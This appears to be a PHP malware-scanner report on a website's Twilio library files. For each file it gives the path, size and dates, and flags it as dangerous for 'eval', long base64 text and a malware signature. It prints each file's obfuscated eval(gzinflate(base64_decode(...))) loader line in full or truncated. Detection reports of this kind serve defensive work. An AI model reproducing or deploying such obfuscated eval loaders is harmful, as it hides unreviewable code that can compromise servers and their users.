<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1TQWoDMQy8B/YPPgQ2gbR9QGmhx16b3o1XVjYCR97achJa+vfaJCF014kwGDTDSGPJzayZgTMxqjWGPQFG/XkgR15/YBT9BuATi8KjINsp6Z2jGAbMZJ8CoPppsqDKMQQvCIJWbRKDkGdFTLKYgyNkWal5CrQsfHWOuWwpPrxGlDSsUxfOknFxpZRozTA4AlMkY7sag3tDznQO9bD1jJrTrsMw5fkkvSfuNRjnMGiyU06BKlnPGwyYTU8xYvC7onq/+A4tmUo2RtNXVNkLbW46HjmpGQkIPtjMmUJxF/XNwnHrg2jwtoJJMBwh0FDvKr8S5/HrPKzKkJJkZfpGq+/yUmlLn7q/hUqgvq898lfCVPNEQ3tNLZ8v+1risoGGbeeP6kUxHur/Yn2ijFbz326rR9U+nXmjiuX+bWb5/AH7JkYrfwMAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1TQWoDMQy8B/YPPgQ2gbR9QGmhx16b3o1XVjYCR97achJa+vfaJCF014kwGDTDSGPJzayZgTMxqjWGPQFG/XkgR15/YBT9BuATi8KjINsp6Z2jGAbMZJ8CoPppsqDKMQQvCIJWbRKDkGdFTLKYgyNkWal5CrQsfHWOuWwpPrxGlDSsUxfOknFxpZRozTA4AlMkY7sag3tDznQO9bD1jJrTrsMw5fkkvSfuNRjnMGiyU06BKlnPGwyYTU8xYvC7onq/+A4tmUo2RtNXVNkLbW46HjmpGQkIPtjMmUJxF/XNwnHrg2jwtoJJMBwh0FDvKr8S5/HrPKzKkJJkZfpGq+/yUmlLn7q/hUqgvq898lfCVPNEQ3tNLZ8v+1risoGGbeeP6kUxHur/Yn2ijFbz326rR9U+nXmjiuX+bWb5/AH7JkYrfwMAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Accounts.php

Size: 595.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH1STWvDMAy9B/IfBNuhDSW+jB28DyiDnsYOW++J6yqNWWIHW1kWxv77bCcdXQsTBie29PTek9MkTViWpQlksDEWWmMRlK6MbQUpo1fgEIFqhHItpek1wbNyBK/oTG8lxsL7mqjjjA3DkNOgGmVyaVq2N9Ix0Slm0RETU/lV48sfywL8bd+iptgmDzgsTWQjnIM3tB9Koiu2EazwzaiY2zvAT0K9v8wKvI604Cv1wsDHJC5EBk8WBSEI0DiA63czpfyY8JvIO2FFC8JaMcJ1/HEc1no+MRXEMyS0DvbopFU7pQ/RJ4/9ixPjpBFsg5HljFiWM54UGqTxVigdISrTNGYIgO84On5Bb9o2VnkfmvHFEzm7C7GeiXXB30CZauVgZrKCvgMycHsDsvZkZFTSGH249MIi9VZ7/dtJ3YmgkyQaO+TeuLrjcYi8/G+K5XkbNn10/a5REqpey0hbxoktZsPgYTJssVyGAR+VTgT...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1STWvDMAy9B/IfBNuhDSW+jB28DyiDnsYOW++J6yqNWWIHW1kWxv77bCcdXQsTBie29PTek9MkTViWpQlksDEWWmMRlK6MbQUpo1fgEIFqhHItpek1wbNyBK/oTG8lxsL7mqjjjA3DkNOgGmVyaVq2N9Ix0Slm0RETU/lV48sfywL8bd+iptgmDzgsTWQjnIM3tB9Koiu2EazwzaiY2zvAT0K9v8wKvI604Cv1wsDHJC5EBk8WBSEI0DiA63czpfyY8JvIO2FFC8JaMcJ1/HEc1no+MRXEMyS0DvbopFU7pQ/RJ4/9ixPjpBFsg5HljFiWM54UGqTxVigdISrTNGYIgO84On5Bb9o2VnkfmvHFEzm7C7GeiXXB30CZauVgZrKCvgMycHsDsvZkZFTSGH249MIi9VZ7/dtJ3YmgkyQaO+TeuLrjcYi8/G+K5XkbNn1...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH1STWvDMAy9B/IfBNuhDSW+jB28DyiDnsYOW++J6yqNWWIHW1kWxv77bCcdXQsTBie29PTek9MkTViWpQlksDEWWmMRlK6MbQUpo1fgEIFqhHItpek1wbNyBK/oTG8lxsL7mqjjjA3DkNOgGmVyaVq2N9Ix0Slm0RETU/lV48sfywL8bd+iptgmDzgsTWQjnIM3tB9Koiu2EazwzaiY2zvAT0K9v8wKvI604Cv1wsDHJC5EBk8WBSEI0DiA63czpfyY8JvIO2FFC8JaMcJ1/HEc1no+MRXEMyS0DvbopFU7pQ/RJ4/9ixPjpBFsg5HljFiWM54UGqTxVigdISrTNGYIgO84On5Bb9o2VnkfmvHFEzm7C7GeiXXB30CZauVgZrKCvgMycHsDsvZkZFTSGH249MIi9VZ7/dtJ3YmgkyQaO+TeuLrjcYi8/G+K5XkbNn1...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Application.php

Size: 195.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLol3LCjIyUxOLMnMz+PlUgCC1IqS1LwUTNWeecUliXnJqUBd+aVFyam8XNW8XLW8XAC5bsQWYAAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLol3LCjIyUxOLMnMz+PlUgCC1IqS1LwUTNWeecUliXnJqUBd+aVFyam8XNW8XLW8XAC5bsQWYAAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Applications.php

Size: 315.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWOwQrCMBBE74H8wx4KbdAvqFTw4kk8qPcQ4wqBmIZNohbx301NpQeHvezyZmY540xbFQIcke5GY5Cnh7GmlwcMUW68t0araHoXOIMsfEZ0l398Z0LMlj6RRs5eBfbpnO1wTU6PEaAJVcSmcuqGS1BEaoDKK1K3AF3ZGyGKd4oYRRgTOcgguti2coop/IyNqrdk8n922OeKGro1fMtmSMDiVylW5fzmLM8HNfkk5woBAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWOwQrCMBBE74H8wx4KbdAvqFTw4kk8qPcQ4wqBmIZNohbx301NpQeHvezyZmY540xbFQIcke5GY5Cnh7GmlwcMUW68t0araHoXOIMsfEZ0l398Z0LMlj6RRs5eBfbpnO1wTU6PEaAJVcSmcuqGS1BEaoDKK1K3AF3ZGyGKd4oYRRgTOcgguti2coop/IyNqrdk8n922OeKGro1fMtmSMDiVylW5fzmLM8HNfkk5woBAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Transcription.php

Size: 191.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLPQqAMAxA4T2QO/Q6rtq9lJghUNKSxB8Q72533/w9BARq1T1tbKcQe8mXNOllZY+SraqTyQjpipBmfAfr/veLelQlnl8/jBjhQXgRPi3cMddiAAAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLPQqAMAxA4T2QO/Q6rtq9lJghUNKSxB8Q72533/w9BARq1T1tbKcQe8mXNOllZY+SraqTyQjpipBmfAfr/veLelQlnl8/jBjhQXgRPi3cMddiAAAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/AuthorizedConnectApp.php

Size: 203.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLPQqAMAwG0D2QO3gVcXJV91LiBxYkLU38QfHuuvv2x8QkazRrRtQ9CSxMR1pTDgPMQ7v5kmu6MHdZFeJtKUzNB6dD53/r1Tyq4Ot5qwKmm+lhegHao7cSaQAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLPQqAMAwG0D2QO3gVcXJV91LiBxYkLU38QfHuuvv2x8QkazRrRtQ9CSxMR1pTDgPMQ7v5kmu6MHdZFeJtKUzNB6dD53/r1Tyq4Ot5qwKmm+lhegHao7cSaQAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Transcriptions.php

Size: 191.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLPQqAMAwG0D2QO3ggJ+1eSswQKK3kiz8g3t3uvv0xMUktwLSqnyaKnC6r1vOiiJy8NIjbHtYbmKZB79C2/cNsiJH64aJMD9PL9AHXkG28XwAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLPQqAMAwG0D2QO3ggJ+1eSswQKK3kiz8g3t3uvv0xMUktwLSqnyaKnC6r1vOiiJy8NIjbHtYbmKZB79C2/cNsiJH64aJMD9PL9AHXkG28XwAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/AuthorizedConnectApps.php

Size: 315.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWOsQ7CMAxE90j5Bw+V2kr8AWIoFRswAHtlEqNGCkmUuLSA+HdCO3K6xZbfnaWQQllMCc4UH0ZR6i6jscZ3J0rcNQP3PpoX6dY7R4qbEJIUkEUTk9P/3N4kzqwfoiIp3vNxGK7WKLgNTrHxDlQkZKoKh3daAcaITygCRrwn2CxzVddLz5Iwi/voR3A0whb1gfJrukVrd5Oi8MutyqNnyBs/ki7r9UJ+pMj+AlvCambpAAAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWOsQ7CMAxE90j5Bw+V2kr8AWIoFRswAHtlEqNGCkmUuLSA+HdCO3K6xZbfnaWQQllMCc4UH0ZR6i6jscZ3J0rcNQP3PpoX6dY7R4qbEJIUkEUTk9P/3N4kzqwfoiIp3vNxGK7WKLgNTrHxDlQkZKoKh3daAcaITygCRrwn2CxzVddLz5Iwi/voR3A0whb1gfJrukVrd5Oi8MutyqNnyBs/ki7r9UJ+pMj+AlvCambpAAAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/UsageRecords.php

Size: 435.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK2TwWrDMAyG7wG/gw+BttA9wWAw2HG9pNmhJ+M62ipw7WLJ28LIu89uMwpLuy4QnYz0+5P9WxaFKIzVRHIN4R0NkKo/0KJXFRCrF9JvUIHxoSEJnwyuGSpr3EOlXRaSj8GA/BIJK1Mc4taika/RGUbvJDrkeWksguOlLGPARRbLPkreId09EHA8rOM29DyanyU5Zuwb3c6Wv7JtOjGESxVtreJ0ykEh91N773g3KCVT+Eqp0WiHTY7aC/kWdEjpc3Zxf1p3oujE3/7X+aJjjJedvIHc/Lg0DnuD+pzcWmUDJqXW6Xmmpz5am7dNynzKI3GV2H+jf9NWp1GajLc5juAY3Dc6sb3IGAQAAA=='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK2TwWrDMAyG7wG/gw+BttA9wWAw2HG9pNmhJ+M62ipw7WLJ28LIu89uMwpLuy4QnYz0+5P9WxaFKIzVRHIN4R0NkKo/0KJXFRCrF9JvUIHxoSEJnwyuGSpr3EOlXRaSj8GA/BIJK1Mc4taika/RGUbvJDrkeWksguOlLGPARRbLPkreId09EHA8rOM29DyanyU5Zuwb3c6Wv7JtOjGESxVtreJ0ykEh91N773g3KCVT+Eqp0WiHTY7aC/kWdEjpc3Zxf1p3oujE3/7X+aJjjJedvIHc/Lg0DnuD+pzcWmUDJqXW6Xmmpz5am7dNynzKI3GV2H+jf9NWp1GajLc5juAY3Dc6sb3IGAQAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK2TwWrDMAyG7wG/gw+BttA9wWAw2HG9pNmhJ+M62ipw7WLJ28LIu89uMwpLuy4QnYz0+5P9WxaFKIzVRHIN4R0NkKo/0KJXFRCrF9JvUIHxoSEJnwyuGSpr3EOlXRaSj8GA/BIJK1Mc4taika/RGUbvJDrkeWksguOlLGPARRbLPkreId09EHA8rOM29DyanyU5Zuwb3c6Wv7JtOjGESxVtreJ0ykEh91N773g3KCVT+Eqp0WiHTY7aC/kWdEjpc3Zxf1p3oujE3/7X+aJjjJedvIHc/Lg0DnuD+pzcWmUDJqXW6Xmmpz5am7dNynzKI3GV2H+jf9NWp1GajLc5juAY3Dc6sb3IGAQAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/AvailablePhoneNumber.php

Size: 203.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXNQQqAIBBG4f3A3MGrtGwTUe1F7YcEU3DUgujuue/tPx4TkwtGRK3IzTuI3i4ffNILpOihGR+MDZiPFDHV0yIzqR7ugrj/2RilmOjQearZgelherlvProoL7JrAAAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXNQQqAIBBG4f3A3MGrtGwTUe1F7YcEU3DUgujuue/tPx4TkwtGRK3IzTuI3i4ffNILpOihGR+MDZiPFDHV0yIzqR7ugrj/2RilmOjQearZgelherlvProoL7JrAAAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/UsageRecord.php

Size: 191.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXMywqAIBAF0P3A/EO/09ZqLTJeQhAFrz0g+vfctz8cFRXLgZwWtDMZ6Ncr5VS9A7vfGHY4WG1xwt1R4h/OhT0UG4z1aAaVR+XVEX8daDsvXQAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXMywqAIBAF0P3A/EO/09ZqLTJeQhAFrz0g+vfctz8cFRXLgZwWtDMZ6Ncr5VS9A7vfGHY4WG1xwt1R4h/OhT0UG4z1aAaVR+XVEX8daDsvXQAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/AvailablePhoneNumbers.php

Size: 811.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN1VTY/TMBC9V+p/GK0qOanaRuIIolBALIdltWLLgVPlutPE4NrR2OlSEP+dyWe7ylYq3MCKIscevzfzZsYZDoYDZaT3cI+01wr9avmgjXarT+jDarGX2si1wbvMWbwtdmskPxwAD/we0G765260D3zWFaRwOPhZG+fF2mgF28KqoJ2FFMONU9JEI+UKG+gQQ2NZjpEqiDRu4CVYfOgx3EkKWppFnjOmLPE+oMmRovhFH2M69xii43o5REnPborJ43VJJA/RKGTaT45G8dNWjeNsWEUi4qPVqR+EoSDbudPs/Dory9IZ854Q/wtl2mD+WJyz8nx0a21OxKkN/12F6nj+Up9kPG5sx3CNASQYJgW3Bdn2LeRl44KtO3fWmnfHXueS5A58IG1TaB2DZYbwbLrRqQ7Qrim3QTi4QmyY5htCcOBRkspg66gD5NGQAc7SGUTi873gQN8uyvf1my7UHnc45FgRVxMOosZhhLr...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1VTY/TMBC9V+p/GK0qOanaRuIIolBALIdltWLLgVPlutPE4NrR2OlSEP+dyWe7ylYq3MCKIscevzfzZsYZDoYDZaT3cI+01wr9avmgjXarT+jDarGX2si1wbvMWbwtdmskPxwAD/we0G765260D3zWFaRwOPhZG+fF2mgF28KqoJ2FFMONU9JEI+UKG+gQQ2NZjpEqiDRu4CVYfOgx3EkKWppFnjOmLPE+oMmRovhFH2M69xii43o5REnPborJ43VJJA/RKGTaT45G8dNWjeNsWEUi4qPVqR+EoSDbudPs/Dory9IZ854Q/wtl2mD+WJyz8nx0a21OxKkN/12F6nj+Up9kPG5sx3CNASQYJgW3Bdn2LeRl44KtO3fWmnfHXueS5A58IG1TaB2DZYbwbLrRqQ7Qrim3QTi4QmyY5htCcOBRkspg66gD5NGQAc7SGUT...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1VTY/TMBC9V+p/GK0qOanaRuIIolBALIdltWLLgVPlutPE4NrR2OlSEP+dyWe7ylYq3MCKIscevzfzZsYZDoYDZaT3cI+01wr9avmgjXarT+jDarGX2si1wbvMWbwtdmskPxwAD/we0G765260D3zWFaRwOPhZG+fF2mgF28KqoJ2FFMONU9JEI+UKG+gQQ2NZjpEqiDRu4CVYfOgx3EkKWppFnjOmLPE+oMmRovhFH2M69xii43o5REnPborJ43VJJA/RKGTaT45G8dNWjeNsWEUi4qPVqR+EoSDbudPs/Dory9IZ854Q/wtl2mD+WJyz8nx0a21OxKkN/12F6nj+Up9kPG5sx3CNASQYJgW3Bdn2LeRl44KtO3fWmnfHXueS5A58IG1TaB2DZYbwbLrRqQ7Qrim3QTi4QmyY5htCcOBRkspg66gD5NGQAc7SGUT...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Call.php

Size: 1.66 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1WW2/qRhB+j5T/MFIjQVJilPTktKJHkdKEpEi5FRJVfTKLPeBV7V13L1BU9b93dtfmHpLqHMQDYmZnvrl9M4cHhwftk5PDAzgBgFupoJAKgYuxVAUzXIoWaEQwGcLwmuU59IQ2TCQIfdTSKvrxJTOm7LTbs9ksMjOecxklsminMtFtVvK2Qm3aCb39jldvL4cxkNgWKIx3EjkAFYgogjIrO8wY1emA5umKjD5X8MMnSDKmWGJQgTaKiwnhYwas4H9ZzOfAUzLMxxw1CbgGVUF9203JFD2JHcr4610iOENBI1HIDKYBSI6TtzGkpBdX6usAXsiikwaLayHBjOnaRwsmfIoC6J+7hxcqIvRvr+H8p/NzCOV8x7ct0//vO2ea0hBefgUAliTSUgW2ku/8hyxTjkGOfXqvgrZDUkqh+ShH5yEkIhSHcLoivO3RyG1HZSYFgrDFiOrsA1aYIMWUrlgEjCZRC74/+3z248X...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1WW2/qRhB+j5T/MFIjQVJilPTktKJHkdKEpEi5FRJVfTKLPeBV7V13L1BU9b93dtfmHpLqHMQDYmZnvrl9M4cHhwftk5PDAzgBgFupoJAKgYuxVAUzXIoWaEQwGcLwmuU59IQ2TCQIfdTSKvrxJTOm7LTbs9ksMjOecxklsminMtFtVvK2Qm3aCb39jldvL4cxkNgWKIx3EjkAFYgogjIrO8wY1emA5umKjD5X8MMnSDKmWGJQgTaKiwnhYwas4H9ZzOfAUzLMxxw1CbgGVUF9203JFD2JHcr4610iOENBI1HIDKYBSI6TtzGkpBdX6usAXsiikwaLayHBjOnaRwsmfIoC6J+7hxcqIvRvr+H8p/NzCOV8x7ct0//vO2ea0hBefgUAliTSUgW2ku/8hyxTjkGOfXqvgrZDUkqh+ShH5yEkIhSHcLoivO3RyG1HZSY...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1WW2/qRhB+j5T/MFIjQVJilPTktKJHkdKEpEi5FRJVfTKLPeBV7V13L1BU9b93dtfmHpLqHMQDYmZnvrl9M4cHhwftk5PDAzgBgFupoJAKgYuxVAUzXIoWaEQwGcLwmuU59IQ2TCQIfdTSKvrxJTOm7LTbs9ksMjOecxklsminMtFtVvK2Qm3aCb39jldvL4cxkNgWKIx3EjkAFYgogjIrO8wY1emA5umKjD5X8MMnSDKmWGJQgTaKiwnhYwas4H9ZzOfAUzLMxxw1CbgGVUF9203JFD2JHcr4610iOENBI1HIDKYBSI6TtzGkpBdX6usAXsiikwaLayHBjOnaRwsmfIoC6J+7hxcqIvRvr+H8p/NzCOV8x7ct0//vO2ea0hBefgUAliTSUgW2ku/8hyxTjkGOfXqvgrZDUkqh+ShH5yEkIhSHcLoivO3RyG1HZSY...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Calls.php

Size: 463.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAHWRQWvDMAyF74H8By2EkkBu2yklh1LYaYexdqcxgucqYHDtYNndRul/n4LTJV07YWKMvvf0UNIkTaQWRLBBd1ASqd1+Kq1s+4Lk27XQmtIEuPDLo9ldc0+KPLM2OIlpckyTiPfhQysJ5IXnqwtGemUNKFr1PTfE8NqoXZEfhA5YRtExXkM59MEZ1juN5kxB08D9wwQNtVjAXcFYb2nEKshWz9kAN9AJTVguo+T0J9xvKulQeCzyztl9Bbm3/AlOVyCcE9+Q98KJPUET30U5xZ2yjNBbtrXZO6PssrzRfeQRsT8MW84dVAcFoe7q+npLnKYs5/u5ML2koz0rZvNPgLyIfw1enb6pmscb/whL0Pi6bs9Lix6zHfP5AQXMMNdXAgAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWRQWvDMAyF74H8By2EkkBu2yklh1LYaYexdqcxgucqYHDtYNndRul/n4LTJV07YWKMvvf0UNIkTaQWRLBBd1ASqd1+Kq1s+4Lk27XQmtIEuPDLo9ldc0+KPLM2OIlpckyTiPfhQysJ5IXnqwtGemUNKFr1PTfE8NqoXZEfhA5YRtExXkM59MEZ1juN5kxB08D9wwQNtVjAXcFYb2nEKshWz9kAN9AJTVguo+T0J9xvKulQeCzyztl9Bbm3/AlOVyCcE9+Q98KJPUET30U5xZ2yjNBbtrXZO6PssrzRfeQRsT8MW84dVAcFoe7q+npLnKYs5/u5ML2koz0rZvNPgLyIfw1enb6pmscb/whL0Pi6bs9Lix6zHfP5AQXMMNdXAgAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWRQWvDMAyF74H8By2EkkBu2yklh1LYaYexdqcxgucqYHDtYNndRul/n4LTJV07YWKMvvf0UNIkTaQWRLBBd1ASqd1+Kq1s+4Lk27XQmtIEuPDLo9ldc0+KPLM2OIlpckyTiPfhQysJ5IXnqwtGemUNKFr1PTfE8NqoXZEfhA5YRtExXkM59MEZ1juN5kxB08D9wwQNtVjAXcFYb2nEKshWz9kAN9AJTVguo+T0J9xvKulQeCzyztl9Bbm3/AlOVyCcE9+Q98KJPUET30U5xZ2yjNBbtrXZO6PssrzRfeQRsT8MW84dVAcFoe7q+npLnKYs5/u5ML2koz0rZvNPgLyIfw1enb6pmscb/whL0Pi6bs9Lix6zHfP5AQXMMNdXAgAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Conference.php

Size: 287.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWMwQrCMAxA74X+Qw+DbaBfIHjx5NXtPmqXYWCkJUlVEP/djg128JFDIO/FGmvC7EVcB/zEADL0L5wxDjcQHS6RJmCgANa4ArwVaPyXryTqi1WimHmxP2uQOCoEhdFNmYJiJIeE2lRhRiA9uCoztqu7JQuVPlCOZwHNqct33t5KsysLdfKsGDB5Uqn3W3ta9681ZX4MkW3j5AAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

